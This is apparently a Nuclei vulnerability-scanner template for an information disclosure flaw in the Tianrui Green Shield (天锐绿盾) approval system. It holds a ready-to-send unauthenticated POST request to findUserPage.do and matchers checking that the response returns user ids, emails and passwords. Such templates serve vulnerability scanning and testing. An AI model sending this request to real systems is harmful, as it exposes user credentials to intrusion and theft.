id: tianrui-findUserPage_do-Information-disclosure

info:
  name: 天锐绿盾审批系统 findUserPage.do 信息泄露漏洞
  author: tianrui
  severity: medium
  tags: Information disclosure

http:
  - raw:
      - |
        POST /trwfe/user/findUserPage.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        userName=&deptId=0&page=1&rows=10
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"id":'
          - '"lastName":'
          - '"email":'
          - '"password":'
        condition: and
      - type: status
        status: 
          - 200